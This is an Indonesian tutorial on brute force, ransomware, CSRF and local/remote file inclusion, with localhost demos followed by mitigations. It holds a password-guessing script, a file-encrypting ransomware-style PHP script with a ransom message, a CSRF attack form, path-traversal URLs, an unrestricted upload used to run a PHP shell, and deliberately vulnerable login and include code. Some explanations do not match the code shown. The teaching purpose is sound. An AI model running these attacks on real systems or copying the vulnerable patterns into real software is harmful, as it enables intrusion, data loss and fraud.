Brute Force

 

1. Pengertian Brute Force

Brute Force adalah metode dalam bidang keamanan komputer dan kriptografi yang digunakan untuk menemukan informasi, seperti kata sandi atau kunci enkripsi, dengan mencoba semua kemungkinan kombinasi secara sistematis. Dalam konteks keamanan, serangan brute force biasanya melibatkan upaya mencoba setiap kemungkinan kombinasi karakter hingga menemukan yang benar.

Karena setiap kemungkinan dicoba satu per satu, metode ini bisa sangat memakan waktu dan sumber daya, terutama jika panjang kombinasi yang harus dicoba sangat besar. Namun, metode brute force tetap efektif dalam beberapa situasi, terutama ketika tidak ada cara lain yang lebih efisien untuk menemukan informasi yang dicari. Untuk melindungi sistem dari serangan brute force, biasanya digunakan teknik seperti pembatasan jumlah percobaan login, penggunaan kata sandi yang kuat, dan penggunaan autentikasi dua faktor.

2. Sejarah Brute Force

• Awal Mula: Konsep brute force telah ada sejak awal perkembangan komputer dan kriptografi. Pada awalnya, serangan ini dilakukan secara manual oleh individu yang mencoba kombinasi secara satu per satu.
• Perkembangan Teknologi: Dengan kemajuan teknologi komputer, brute force menjadi lebih cepat dan efisien. Penggunaan komputer modern dan perangkat keras khusus seperti GPU memungkinkan penyerang untuk mencoba miliaran kombinasi per detik.
• Keamanan Kontemporer: Saat ini, brute force sering dikombinasikan dengan teknik lain dalam serangan multi-faceted, seperti phishing atau exploit software, untuk meningkatkan peluang keberhasilan.

3. Dampak Brute Force

• Kompromi Data: Jika berhasil, serangan brute force dapat menyebabkan kebocoran data pribadi atau sensitif, yang dapat berdampak pada privasi individu dan keamanan organisasi.
• Kerugian Finansial: Organisasi yang terkena dampak mungkin menghadapi kerugian finansial akibat pencurian identitas, penipuan, atau biaya pemulihan dari serangan.
• Kerusakan Reputasi: Kegagalan dalam melindungi sistem dapat merusak reputasi perusahaan dan mengurangi kepercayaan pelanggan atau mitra bisnis.
• Gangguan Operasional: Serangan brute force yang intens dapat membebani sistem dan jaringan, menyebabkan gangguan dalam operasi normal.

4. Pencegahan Brute Force

• Penggunaan Password Kuat: Menggunakan password yang panjang dan kompleks (menggabungkan huruf besar, huruf kecil, angka, dan simbol) dapat memperlambat proses brute force.
• Lockout dan Pembatasan: Menerapkan mekanisme lockout setelah sejumlah percobaan login yang gagal dapat mengurangi kemungkinan serangan brute force. Misalnya, akun bisa dikunci untuk periode waktu tertentu setelah beberapa kali percobaan gagal.
• Verifikasi Multi-Faktor (MFA): Menggunakan MFA menambah lapisan keamanan tambahan yang membuat serangan brute force menjadi jauh lebih sulit, karena penyerang harus melewati lebih dari sekadar password.
• Pemantauan dan Peringatan: Memantau aktivitas login dan mengatur peringatan untuk percobaan login yang tidak biasa dapat membantu mendeteksi dan merespons serangan secara lebih cepat.
• Penggunaan Captcha: Captcha pada halaman login dapat mencegah otomatisasi dari upaya login berulang kali, mempersulit penyerang untuk melanjutkan serangan brute force.

Demo:

• Buat folder brute_force di disk:C
• Buat file index.php dan isikan kode berikut:
• <?php

  session_start();

  $users = [

      'admin' => 'password123',

      'user' => 'userpass'

  ];

      if ($_SERVER['REQUEST_METHOD'] == 'POST') {

          $username = $_POST['username'];

          $password = $_POST['password'];

              if (isset($users[$username]) && $users[$username] == $password) {

                  $_SESSION['username'] = $username;

                  echo "Login berhasil!";

              } else {

                  echo "Login gagal!";

              }

      }

  ?>

  
  

  <!DOCTYPE html>

  <html>

  <head>

      <title>Login</title>

  </head>

  <body>

      <form method="post" action="">

          Username: <input type="text" name="username"><br>

          Password: <input type="password" name="password"><br>

          <input type="submit" value="Login">

      </form>

  </body>

  </html>

  
  
  
• Simulasi serangan brute force dengan python 
• Buat file brute_force.py dan isikan kode berikut(untuk httpx, dapat melakukan installasi dengan mengetikan pip install httpx):
• import hashlib

  import httpx

  
  

  url = "http://localhost/brute_force/index.php"

  username = "admin"

  passwords = ["password", "123456", "password123", "admin", "userpass"]

  
  

  for password in passwords:

      # hashed_password = hashlib.md5(password.encode()).hexdigest()

      data = {

          "username": username,

          "password": password

      }

      response = httpx.post(url, data=data)

      if "Login berhasil" in response.text:

          print(f"Password ditemukan: {password}")

          break

      else:

          print(f"Percobaan gagal: {password}")

  
  
  
• Buka browser dan login dengan user admin/password123 pada url http://localhost/brute_force/index.php 
• 
  
  
  
  
• Jalankan serangan brute force pada terminal/cmd (pastikan terinstall python) dengan mengetikkan python brute_force.py 

• Tambahkan script untuk mencegah serangan brute force

• Untuk mencegah serangan brute force pada file PHP Anda, Anda dapat menambahkan beberapa mekanisme untuk membatasi jumlah percobaan login yang dapat dilakukan dalam jangka waktu tertentu. Salah satu cara untuk melakukannya adalah dengan menyimpan informasi tentang percobaan login di sesi atau basis data, dan memblokir atau menunda permintaan setelah sejumlah percobaan yang gagal.

  Berikut adalah contoh implementasi sederhana menggunakan sesi PHP untuk membatasi jumlah percobaan login:

• <?php

  session_start();

  
  

  // Inisialisasi pengguna dan kata sandi

  $users = [

      'admin' => 'password123',

      'user' => 'userpass'

  ];

  
  

  // Maksimal percobaan login

  $max_attempts = 5;

  // Waktu penguncian dalam detik (misalnya 15 menit)

  $lockout_time = 15 * 60;

  
  

  if (!isset($_SESSION['attempts'])) {

      $_SESSION['attempts'] = 0;

  }

  
  

  if (!isset($_SESSION['lockout_time'])) {

      $_SESSION['lockout_time'] = 0;

  }

  
  

  if ($_SERVER['REQUEST_METHOD'] == 'POST') {

      $current_time = time();

  
  

      if ($_SESSION['attempts'] >= $max_attempts && $current_time < $_SESSION['lockout_time']) {

          echo "Terlalu banyak percobaan login. Coba lagi nanti.";

      } else {

          $username = $_POST['username'];

          $password = $_POST['password'];

  
  

          if (isset($users[$username]) && $users[$username] == $password) {

              $_SESSION['username'] = $username;

              $_SESSION['attempts'] = 0;

              $_SESSION['lockout_time'] = 0;

              echo "Login berhasil!";

          } else {

              $_SESSION['attempts'] += 1;

  
  

              if ($_SESSION['attempts'] >= $max_attempts) {

                  $_SESSION['lockout_time'] = $current_time + $lockout_time;

                  echo "Terlalu banyak percobaan login. Coba lagi nanti.";

              } else {

                  echo "Login gagal!";

              }

          }

      }

  }

  ?>

  
  

  <!DOCTYPE html>

  <html>

  <head>

      <title>Login</title>

  </head>

  <body>

      <form method="post" action="">

          Username: <input type="text" name="username"><br>

          Password: <input type="password" name="password"><br>

          <input type="submit" value="Login">

      </form>

  </body>

  </html>

  
  
• Meski begitu tetap masih perlu keamanan tambahan, seperti menambahkan

1. Gunakan Captcha: Menambahkan Captcha pada formulir login dapat membantu memverifikasi bahwa pengguna adalah manusia dan bukan skrip otomatis.
2. Menggunakan Rate Limiting: Implementasikan rate limiting untuk membatasi jumlah permintaan yang dapat dilakukan oleh alamat IP tertentu dalam jangka waktu tertentu.
3. Tingkatkan Keamanan dengan IP Blocking: Blokir alamat IP yang mencurigakan atau yang melakukan terlalu banyak percobaan login gagal.

 

RANSOMWARE

1. Pengertian Ransomware

Ransomware adalah jenis perangkat lunak berbahaya (malware) yang dirancang untuk menginfeksi komputer atau jaringan komputer dengan tujuan mengunci atau mengenkripsi data korban. Setelah data terkunci atau terenkripsi, pelaku akan meminta tebusan (ransom) dari korban agar data tersebut dapat dikembalikan atau diakses kembali. Umumnya, tebusan ini harus dibayar menggunakan mata uang kripto seperti Bitcoin, yang sulit dilacak.

2. Sejarah Ransomware

Ransomware pertama kali muncul pada akhir tahun 1980-an. Berikut adalah beberapa tonggak sejarah penting dalam perkembangan ransomware:

• 1989: AIDS Trojan (PC Cyborg): Ransomware pertama yang diketahui, juga dikenal sebagai AIDS Trojan atau PC Cyborg, disebarkan melalui disket. Malware ini akan menyembunyikan file direktori dan mengenkripsi nama file pada drive C:, kemudian menuntut pembayaran sebesar $189 kepada PC Cyborg Corporation.

• 2005-2006: Ransomware modern: Jenis ransomware modern mulai muncul, menggunakan enkripsi yang lebih canggih dan metode distribusi yang lebih luas, seperti melalui email atau situs web yang terinfeksi.

• 2013: CryptoLocker: Salah satu ransomware paling terkenal yang menyebar melalui lampiran email berbahaya. CryptoLocker menggunakan enkripsi RSA dan menuntut pembayaran dalam Bitcoin.

• 2017: WannaCry: Ransomware ini menyebar secara global dan mempengaruhi ratusan ribu komputer dalam hitungan hari. WannaCry memanfaatkan kerentanan dalam sistem operasi Windows yang dikenal sebagai EternalBlue, yang dieksploitasi oleh kelompok hacker Shadow Brokers.

• 2020-an: Evolusi dan peningkatan serangan: Ransomware terus berkembang dengan teknik baru, termasuk model Ransomware-as-a-Service (RaaS), di mana penjahat siber menjual atau menyewakan ransomware mereka kepada pihak ketiga.

• 
  

3. Dampak Ransomware

Dampak dari serangan ransomware dapat sangat merugikan, baik dari segi finansial maupun operasional. Berikut adalah beberapa dampak utama dari serangan ransomware:

• Kerugian Finansial: Pembayaran tebusan seringkali sangat mahal, dan biaya pemulihan data yang terinfeksi juga dapat mencapai jutaan dolar.

• Gangguan Operasional: Sistem yang terinfeksi mungkin tidak dapat digunakan hingga data dipulihkan, menyebabkan gangguan besar pada operasi bisnis atau layanan publik.

• Kehilangan Data: Jika data tidak dapat dipulihkan, perusahaan atau individu mungkin kehilangan data penting secara permanen.

• Kerusakan Reputasi: Serangan ransomware dapat merusak reputasi perusahaan atau organisasi, menurunkan kepercayaan pelanggan atau publik.

• Implikasi Hukum: Ada kemungkinan adanya konsekuensi hukum jika data pribadi atau sensitif terungkap dalam serangan ransomware.

---

4. Pencegahan Ransomware

Mencegah serangan ransomware membutuhkan pendekatan berlapis yang melibatkan teknologi, pelatihan, dan kebijakan keamanan. Berikut adalah beberapa langkah pencegahan yang dapat diambil:

• Backup Data Secara Rutin: Pastikan untuk melakukan backup data secara teratur dan menyimpan salinan backup di lokasi yang terpisah dari jaringan utama.

• Update dan Patch Sistem: Selalu perbarui perangkat lunak dan sistem operasi dengan patch terbaru untuk mengurangi kerentanan yang dapat dieksploitasi.

• Gunakan Antivirus dan Antimalware: Instal dan perbarui perangkat lunak antivirus dan antimalware untuk mendeteksi dan memblokir malware sebelum infeksi terjadi.

• Pelatihan Keamanan: Edukasi karyawan atau pengguna tentang bahaya phishing dan praktik keamanan siber yang baik, termasuk cara mengenali email atau situs web yang mencurigakan.

• Segmentasi Jaringan: Batasi akses antar bagian jaringan untuk mencegah penyebaran ransomware jika terjadi infeksi.

• Aktifkan Firewall dan IPS/IDS: Gunakan firewall dan sistem deteksi/pencegahan intrusi untuk memonitor dan memblokir aktivitas mencurigakan.

• Aktifkan Enkripsi Data: Enkripsi data penting untuk mengurangi dampak jika data dicuri atau dienkripsi oleh ransomware.

Demo:

• Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder
• Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
• Buat file encrypt.php dan isikan kode berikut:

<?php

// Generate key

$key = base64_encode(openssl_random_pseudo_bytes(32));

// Simpan kunci ke file (untuk dekripsi nantinya)

file_put_contents('key.txt', $key);

// Fungsi untuk mengenkripsi file

function encryptFile($file, $key) {

    $data = file_get_contents($file);

    $method = 'aes-256-cbc';

    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));

    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);

    $encrypted .= '::' . base64_encode($iv);

    file_put_contents($file, $encrypted);

}

// Tentukan folder yang akan dienkripsi

$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));

foreach ($files as $file) {

    if ($file->isFile()) {

        encryptFile($file->getRealPath(), $key);

    }

}

echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";

?>

• Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php 
• 
  
  
  
  
  
  
• Cek folder target_folder dan buka isi filenya 
• 
  
  
  
  
  
  
• Folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan ransomware

Bentuk mitigasi yang bisa dilakukan

Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:

<?php

// Load the key from the file

$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file

function decryptFile($file, $key) {

    $data = file_get_contents($file);

    list($encrypted_data, $iv) = explode('::', $data, 2);

    $method = 'aes-256-cbc';

    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));

    file_put_contents($file, $decrypted);

}

// Tentukan folder yang akan didekripsi

$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));

foreach ($files as $file) {

    if ($file->isFile()) {

        decryptFile($file->getRealPath(), $key);

    }

}

echo "Semua file telah didekripsi.";

?>

Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php 

Dan lihat kembali di folder target_folder

File yang semula terkunci, kini sudah bisa terbuka kembali.

Pencegahan Pasca Serangan Ransomware

Setelah mengalami serangan ransomware, ada beberapa langkah penting yang dapat diambil untuk meminimalkan kerusakan lebih lanjut dan mencegah serangan serupa di masa depan. Berikut adalah panduan pencegahan pasca serangan ransomware:

1. Isolasi dan Kontrol Kerusakan

• Isolasi Sistem yang Terinfeksi: Segera isolasi komputer atau sistem yang terinfeksi dari jaringan utama untuk mencegah penyebaran ransomware ke perangkat lain.
• Matikan Jaringan: Jika perlu, matikan jaringan secara keseluruhan untuk menghentikan penyebaran ransomware hingga situasi terkendali.

---

2. Identifikasi dan Hapus Ransomware

• Identifikasi Jenis Ransomware: Gunakan alat dan layanan yang tersedia untuk mengidentifikasi jenis ransomware yang menyerang sistem Anda. Ini akan membantu menentukan langkah-langkah pemulihan yang tepat.
• Hapus Ransomware: Gunakan perangkat lunak antivirus dan antimalware untuk membersihkan sistem dari ransomware. Pastikan semua salinan ransomware telah dihapus sebelum mencoba memulihkan data.

---

3. Pemulihan Data

• Gunakan Backup: Jika Anda memiliki cadangan data, gunakan backup tersebut untuk memulihkan data yang terinfeksi. Pastikan backup tersebut tidak terinfeksi sebelum digunakan.
• Alat Dekripsi: Cari alat dekripsi yang mungkin tersedia untuk jenis ransomware tertentu. Beberapa organisasi keamanan siber menyediakan alat dekripsi gratis untuk ransomware yang sudah dikenal.

---

4. Laporkan Insiden

• Lapor ke Pihak Berwenang: Laporkan insiden ransomware kepada pihak berwenang, seperti lembaga penegak hukum atau badan keamanan siber nasional. Ini dapat membantu dalam investigasi dan penanggulangan kejahatan siber.
• Lapor ke Regulator: Jika serangan ransomware melibatkan data pribadi atau sensitif, laporkan insiden tersebut kepada regulator yang relevan, seperti komisi perlindungan data.

---

5. Evaluasi dan Pembelajaran

• Analisis Forensik: Lakukan analisis forensik untuk memahami bagaimana serangan terjadi, jalur infeksi, dan kerentanan yang dieksploitasi.
• Evaluasi Proses Keamanan: Tinjau kembali kebijakan dan prosedur keamanan siber yang ada. Identifikasi kelemahan dan buat perbaikan yang diperlukan untuk mencegah serangan serupa di masa depan.

---

6. Tingkatkan Keamanan

• Pembaruan dan Patch: Pastikan semua perangkat lunak, sistem operasi, dan aplikasi diperbarui dengan patch keamanan terbaru.
• Pelatihan Karyawan: Tingkatkan program pelatihan keamanan siber untuk karyawan, termasuk cara mengenali dan merespons ancaman phishing dan malware.
• Implementasi Keamanan Berlapis: Terapkan pendekatan keamanan berlapis yang mencakup firewall, sistem deteksi dan pencegahan intrusi (IDS/IPS), serta solusi keamanan endpoint.
• Segregasi Jaringan: Segmentasi jaringan untuk membatasi akses antar bagian jaringan dan mencegah penyebaran malware.

---

7. Kebijakan dan Prosedur Baru

• Rencana Respons Insiden: Kembangkan atau perbarui rencana respons insiden untuk memastikan tindakan cepat dan efektif jika terjadi serangan ransomware di masa depan.
• Kebijakan Backup: Pastikan kebijakan backup yang kuat dengan jadwal backup rutin dan verifikasi integritas data backup.
• Kebijakan Akses: Tinjau kembali kebijakan akses untuk memastikan hanya individu yang memiliki hak akses yang diperlukan untuk data dan sistem tertentu.

 

 CROSS SITE REQUEST FORGERY

Apa Itu Cross-Site Request Forgery (CSRF)?

Cross-Site Request Forgery (CSRF) adalah salah satu jenis serangan pada aplikasi web di mana penyerang mengeksploitasi identitas pengguna untuk mengirimkan permintaan yang tidak sah ke server aplikasi. CSRF sering kali berhasil karena aplikasi web tidak memverifikasi keaslian permintaan yang datang dari pengguna yang telah diautentikasi.

Cara Kerja CSRF

1. Pengguna Login: Pengguna login ke situs web A dan mendapatkan cookie sesi yang sah.
2. Penyerang Membuat Permintaan Berbahaya: Penyerang membuat halaman web berbahaya atau email yang mengandung permintaan berbahaya ke situs web A.
3. Pengguna Mengunjungi Halaman Berbahaya: Pengguna mengunjungi halaman berbahaya tersebut atau membuka email yang mengandung permintaan berbahaya.
4. Permintaan Tidak Sah Dikirim: Karena pengguna sudah login ke situs web A, permintaan berbahaya tersebut dikirim ke server dengan menggunakan cookie sesi pengguna, sehingga permintaan tersebut tampak sah bagi server.

Sebelum Update: Script Rentan Terhadap Serangan CSRF

Berikut adalah contoh formulir transfer uang yang rentan terhadap serangan CSRF:

index.html

<!DOCTYPE html>

<html>

  <body>

    <h2>Transfer Uang</h2>

    <form action="transfer.php" method="POST">

      <label for="amount">Jumlah:</label><br />

      <input type="text" id="amount" name="amount" /><br />

      <label for="to">Kepada:</label><br />

      <input type="text" id="to" name="to" /><br /><br />

      <input

        type="hidden"

        name="csrf_token"

        value="<?php echo generateToken(); ?>"

      />

      <input type="submit" value="Transfer" />

    </form>

  </body>

</html>

transfer.php

<?php

session_start();

// Proses transfer (tanpa perlindungan CSRF)

$amount = $_POST['amount'];

$to = $_POST['to'];

echo "Transferred $amount to $to";

?>

Pada contoh di atas, tidak ada perlindungan terhadap serangan CSRF. Penyerang dapat membuat formulir yang mengirimkan permintaan POST ke `transfer.php` tanpa sepengetahuan pengguna.

Hasil user

Contoh Serangan CSRF

Berikut adalah contoh script yang dapat digunakan oleh penyerang untuk mengeksploitasi kelemahan CSRF pada aplikasi:

csrf_attack.html:

<!DOCTYPE html>

<html>

  <body>

    <h2>CSRF Attack</h2>

    <form action="http://localhost/csrf/transfer.php" method="POST">

      <input type="hidden" name="amount" value="1000" />

      <input type="hidden" name="to" value="attacker_account" />

      <input type="submit" value="Submit" />

    </form>

  </body>

</html>

Hasil attacker

Sesudah Update: Script Terlindungi dari Serangan CSRF

Untuk melindungi aplikasi web dari serangan CSRF, kita dapat menambahkan token CSRF pada formulir dan memverifikasinya di sisi server.

1. Mengubah `index.html` menjadi `index.php`:

   Karena `index.html` adalah file HTML statis, kita perlu mengubahnya menjadi file PHP untuk bisa menghasilkan token CSRF dinamis.

<?php

session_start();

function generateToken() {

    if (empty($_SESSION['csrf_token'])) {

        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));

    }

    return $_SESSION['csrf_token'];

}

?>

<!DOCTYPE html>

<html>

<body>

  <h2>Transfer Uang</h2>

  <form action="transfer.php" method="POST">

    <label for="amount">Jumlah:</label><br />

    <input type="text" id="amount" name="amount" /><br />

    <label for="to">Kepada:</label><br />

    <input type="text" id="to" name="to" /><br /><br />

    <input type="hidden" name="csrf_token" value="<?php echo generateToken(); ?>" />

    <input type="submit" value="Transfer" />

  </form>

</body>

</html>

2. Memastikan Token CSRF Diterima dan Diverifikasi di `transfer.php`:

<?php

session_start();

function generateToken() {

    if (empty($_SESSION['csrf_token'])) {

        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));

    }

    return $_SESSION['csrf_token'];

}

function verifyToken($token) {

    return $token === $_SESSION['csrf_token'];

}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    if (!isset($_POST['csrf_token']) || !verifyToken($_POST['csrf_token'])) {

        die('Invalid CSRF token');

    }

    // Proses transfer

    $amount = $_POST['amount'];

    $to = $_POST['to'];

    // Lakukan logika transfer di sini

    echo "The account has been verified and the transfer was successfully made to $to an amount of $amount.";

} else {

    die('Invalid request method');

}

?>

   

3. Memastikan Permintaan POST Terkirim dengan Token yang Benar:

   Pastikan bahwa Anda mengakses file `index.php` melalui server lokal Anda, misalnya `http://localhost/csrf/index.php`, bukan `index.html`.

4. Memastikan Tidak Ada Cache yang Mengganggu:

   Bersihkan cache browser atau gunakan mode incognito untuk memastikan tidak ada cache yang mengganggu proses pengiriman token CSRF.

Dengan langkah-langkah di atas, token CSRF seharusnya dihasilkan dan diverifikasi dengan benar, sehingga menghindari kesalahan "Invalid CSRF token". Pastikan juga bahwa session bekerja dengan baik dan tidak ada konflik di server lokal Anda.

Hasil user

Hasil attacker

Dampak dari Serangan CSRF

Serangan CSRF memungkinkan penyerang untuk membuat pengguna yang sah melakukan tindakan yang tidak diinginkan tanpa sepengetahuan mereka. Dampak dari serangan ini dapat sangat merugikan, termasuk:

1. Transaksi Finansial Tidak Sah:

   • Penyerang dapat memaksa pengguna untuk melakukan transfer uang atau pembelian online tanpa sepengetahuan pengguna.

2. Pengubahan Informasi Akun:

   • Informasi pribadi pengguna, seperti alamat email, kata sandi, atau preferensi akun, dapat diubah oleh penyerang.

3. Penyalahgunaan Hak Istimewa:

   • Pengguna dengan hak administratif dapat dipaksa untuk membuat perubahan kritis pada sistem atau menambahkan pengguna dengan hak istimewa tinggi.

4. Pencurian Identitas:

   • Informasi pribadi dan kredensial pengguna dapat disalahgunakan untuk berbagai bentuk penipuan dan pencurian identitas.

5. Kerugian Reputasi:

• Serangan CSRF pada aplikasi web yang dikelola dapat merusak reputasi bisnis dan mengurangi kepercayaan pengguna.

Kesimpulan

Cross-Site Request Forgery (CSRF) adalah serangan yang mengeksploitasi sesi yang sah untuk mengirimkan permintaan tidak sah ke server. Untuk melindungi aplikasi web dari CSRF, teknik seperti penggunaan token CSRF, verifikasi referer/origin, penggunaan CAPTCHA, pengaturan SameSite pada cookie, dan validasi sisi server harus diimplementasikan. Dengan langkah-langkah ini, risiko serangan CSRF dapat diminimalkan.

 

LOCAL/REMOTE FILE INCLUSION

Local File Inclusion (LFI) dan Remote File Inclusion (RFI) adalah dua jenis kerentanan keamanan web yang umum ditemui. Keduanya terjadi ketika aplikasi web secara tidak aman memasukkan file dari server lokal (LFI) atau dari server remote (RFI) ke dalam aplikasi tersebut. Ini dapat mengakibatkan pelanggaran keamanan serius, termasuk eksekusi kode berbahaya, pengungkapan informasi sensitif, dan lain-lain.

Local File Inclusion (LFI)

Definisi: LFI adalah kerentanan yang terjadi ketika sebuah aplikasi web memungkinkan pengguna untuk memasukkan file dari sistem file server lokal tanpa validasi yang tepat. Ini bisa dimanfaatkan untuk membaca file sistem yang sensitif atau bahkan menjalankan kode berbahaya.

Cara Kerja:

1. Inklusi File: Aplikasi web mengambil nama file dari input pengguna dan menggunakannya untuk menyertakan file dalam halaman web.
2. Eksekusi: File tersebut kemudian dieksekusi atau ditampilkan sebagai bagian dari respon web.

Dampak:

• Pengungkapan Informasi: Penyerang dapat membaca file sensitif seperti /etc/passwd atau file konfigurasi aplikasi.
• Eksekusi Kode: Dalam beberapa kasus, penyerang dapat menjalankan kode berbahaya dengan menyertakan file yang berisi skrip PHP.

Mitigasi:

• Validasi Input: Memastikan bahwa input pengguna hanya mengarah ke file yang diizinkan.
• Penggunaan Fungsi Secure: Menggunakan fungsi yang lebih aman dan membatasi akses file, seperti readfile() dengan daftar putih.
• Pembatasan Direktori: Membatasi akses hanya ke direktori tertentu dengan open_basedir pada PHP.

Remote File Inclusion (RFI)

Definisi: RFI adalah kerentanan yang terjadi ketika aplikasi web memungkinkan pengguna untuk memasukkan file dari lokasi remote (server lain) tanpa validasi yang tepat. Ini dapat dimanfaatkan untuk menjalankan kode berbahaya dari server lain.

Cara Kerja:

1. Inklusi File: Aplikasi web mengambil URL dari input pengguna dan menggunakannya untuk menyertakan file dalam halaman web.
2. Eksekusi: File tersebut kemudian dieksekusi sebagai bagian dari respon web.

Dampak:

• Eksekusi Kode Jarak Jauh: Penyerang dapat menjalankan skrip berbahaya dari server mereka.
• Pengambilalihan Sistem: Penyerang dapat mengambil alih server dengan menjalankan perintah sistem.

Mitigasi:

• Nonaktifkan Inklusi URL: Pada PHP, atur allow_url_include ke Off dalam file konfigurasi.
• Validasi Input: Memastikan bahwa input pengguna hanya mengarah ke file yang diizinkan.
• Penggunaan Fungsi Secure: Menggunakan fungsi yang lebih aman dan membatasi akses file.

DEMO 1: SERANGAN LFI

• Buat sebuah folder di C:\xampp\htdocs\ bernama lfi. 
• Di dalam folder lfi, buat file bernama index.php dengan isi sebagai berikut:
• <?php

  // index.php

  $page = isset($_GET['page']) ? $_GET['page'] : 'home.php';

  include($page);

  ?>
• Buat file home.php di folder yang sama dengan isi:
• <?php

  echo "Welcome to the home page!";

  ?>

Demo:

• Buka browser dan akses http://localhost/lfi/index.php. 
• Untuk membaca file di sistem Windows, kita bisa mencoba membaca file C:\xampp\htdocs\lfi\home.php 
• dengan mengubah parameter 
• URL: http://localhost/lfi/index.php?page=C:/xampp/htdocs/lfi/home.php 
• Coba akses file sensitif seperti konfigurasi Apache: http://localhost/lfi/index.php?page=C:/xampp/apache/conf/httpd.conf

Catatan: Penyerang bisa mencoba berbagai path untuk menemukan file yang bisa diakses. 

Bentuk mitigasi yang bisa dilakukan:

<?php

// index.php

// Daftar file yang diperbolehkan

$allowed_pages = [

    'home.php',

    'about.php',

    'contact.php'

];

// Ambil nilai 'page' dari query string dan periksa apakah valid

$page = isset($_GET['page']) ? $_GET['page'] : 'home.php';

if (in_array($page, $allowed_pages)) {

    include($page);

} else {

    // Tampilkan pesan kesalahan atau alihkan ke halaman default

    echo "Halaman tidak ditemukan.";

}

?>

Penjelasan:

1. Daftar File yang Diizinkan: Menggunakan array $allowed_pages untuk menyimpan nama file yang diizinkan dan kunci yang sesuai dengan nilai $_GET['page'].
2. Validasi Input: Menggunakan array_key_exists untuk memeriksa apakah nilai $_GET['page'] ada dalam daftar yang diizinkan.
3. Include File yang Valid: Jika valid, include file yang sesuai dari daftar.

Dengan pendekatan ini, dapat menghindari kemungkinan serangan LFI karena hanya file yang ada dalam daftar yang dapat di-include.

DEMO 2: SERANGAN RFI

Buat folder di C:\xampp\htdocs\ bernama uploads.

Buat file upload.php di C:\xampp\htdocs\lfi\ dengan isi  sebagai berikut:

<?php

if ($_SERVER['REQUEST_METHOD'] == 'POST') {

    $target_dir = "../uploads/";

    $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {

        echo "The file ". htmlspecialchars(basename($_FILES["fileToUpload"]["name"])). " has been uploaded.";

    } else {

        echo "Sorry, there was an error uploading your file.";

    }

}

?>

<!DOCTYPE html>

<html>

<body>

<form action="upload.php" method="post" enctype="multipart/form-data">

    Select file to upload:

    <input type="file" name="fileToUpload" id="fileToUpload">

    <input type="submit" value="Upload File" name="submit">

</form>

</body>

</html>

Buat file PHP berbahaya (shell.php) dengan isi:

<?php

echo "Shell executed!";

?>

Akses http://localhost/lfi/upload.php, pilih file shell.php, dan upload.

Setelah file diupload, akses URL untuk mengeksekusi:

http://localhost/uploads/shell.php

Bentuk mitigasi yang bisa dilakukan:

Untuk mengamankan skrip unggahan file Anda dari serangan Remote File Inclusion (RFI), Anda perlu menerapkan beberapa langkah untuk memastikan hanya file yang sah yang dapat diunggah. Berikut adalah langkah-langkah kunci untuk meningkatkan keamanan skrip Anda:

1. Batasi jenis file: Hanya izinkan jenis file tertentu untuk diunggah (misalnya, gambar, PDF).
2. Periksa ekstensi file: Validasi ekstensi file.
3. Periksa tipe MIME: Validasi tipe MIME dari file yang diunggah.
4. Sanitasi nama file: Hapus karakter khusus dari nama file.
5. Batasi ukuran file: Tetapkan ukuran maksimum file untuk unggahan.

Berikut adalah versi yang ditingkatkan dari skrip Anda yang mencakup langkah-langkah keamanan ini:

<?php

if ($_SERVER['REQUEST_METHOD'] == 'POST') {

    $target_dir = "../uploads/";

    $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

    $uploadOk = 1;

    $fileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

    // Periksa apakah file adalah gambar atau dokumen yang valid

    $allowedFileTypes = array("jpg", "jpeg", "png", "gif", "pdf");

    if (!in_array($fileType, $allowedFileTypes)) {

        echo "Maaf, hanya file JPG, JPEG, PNG, GIF, & PDF yang diizinkan.";

        $uploadOk = 0;

    }

    // Periksa ukuran file (dibatasi hingga 5MB)

    if ($_FILES["fileToUpload"]["size"] > 5000000) {

        echo "Maaf, file Anda terlalu besar.";

        $uploadOk = 0;

    }

    // Periksa apakah file sudah ada

    if (file_exists($target_file)) {

        echo "Maaf, file sudah ada.";

        $uploadOk = 0;

    }

    // Periksa tipe MIME

    $finfo = finfo_open(FILEINFO_MIME_TYPE);

    $mime = finfo_file($finfo, $_FILES["fileToUpload"]["tmp_name"]);

    $allowedMimes = array("image/jpeg", "image/png", "image/gif", "application/pdf");

    if (!in_array($mime, $allowedMimes)) {

        echo "Maaf, tipe file tidak diizinkan.";

        $uploadOk = 0;

    }

    finfo_close($finfo);

    // Sanitasi nama file

    $safeFilename = preg_replace("/[^a-zA-Z0-9_\-\.]/", "", basename($_FILES["fileToUpload"]["name"]));

    $target_file = $target_dir . $safeFilename;

    // Periksa apakah $uploadOk disetel ke 0 oleh kesalahan

    if ($uploadOk == 0) {

        echo "Maaf, file Anda tidak diunggah.";

    // Jika semuanya ok, coba unggah file

    } else {

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {

            echo "File ". htmlspecialchars($safeFilename). " telah diunggah.";

        } else {

            echo "Maaf, terjadi kesalahan saat mengunggah file Anda.";

        }

    }

}

?>

<!DOCTYPE html>

<html>

<body>

<form action="upload.php" method="post" enctype="multipart/form-data">

    Pilih file untuk diunggah:

    <input type="file" name="fileToUpload" id="fileToUpload">

    <input type="submit" value="Unggah File" name="submit">

</form>

</body>

</html>

Penjelasan Penambahan:

1. Jenis File yang Diizinkan: Hanya mengizinkan ekstensi file tertentu (jpg, jpeg, png, gif, pdf).
